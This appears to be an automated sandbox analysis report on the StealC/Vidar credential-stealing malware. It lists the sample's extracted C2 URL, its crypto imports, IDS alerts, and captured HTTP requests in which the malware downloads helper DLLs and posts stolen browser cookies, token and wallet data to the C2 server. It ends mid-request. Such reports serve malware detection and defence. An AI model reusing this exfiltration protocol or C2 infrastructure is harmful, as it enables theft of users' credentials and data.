Source: 0.2.file.exe.a0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.a0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000A9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_000A9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000AC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_000AC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000A7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_000A7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000A9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_000A9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000B8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_000B8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C666C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 42 46 42 31 43 33 39 30 43 32 32 32 38 33 38 34 32 30 38 31 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 2d 2d 0d 0a Data Ascii: ------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="hwid"9BFB1C390C222838420810------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="build"doma------CBKJEGCBKKJECBGCGDBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFCHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 2d 2d 0d 0a Data Ascii: ------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="message"browsers------BAEBFIIECBGCBGDHCAFC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="message"plugins------DGDBKFBAKFBFHIECFBFI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAKHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 2d 2d 0d 0a Data Ascii: ------AEHDAKFIJJKKEBGDBAAKContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------AEHDAKFIJJKKEBGDBAAKContent-Disposition: form-data; name="message"fplugins------AEHDAKFIJJKKEBGDBAAK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 185.215.113.37Content-Length: 6159Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file"------JKFIDGDHJEGIEBFHDGDG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFHHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 2d 2d 0d 0a Data Ascii: ------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="file"------KFIJJEGHDAEBGCAKJKFH--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCBAFIJDGHCAKECAEGCHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 2d 2d 0d 0a Data Ascii: ------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="message"wallets------DGCBAFIJDGHCAKECAEGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFIHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="message"files------BFHDAEHDAKECGCAKFCFI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="file"------CFBFHIEBKJKFHIEBFBAE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFIHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="message"ybncbhylepme------BFHDAEHDAKECGCAKFCFI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 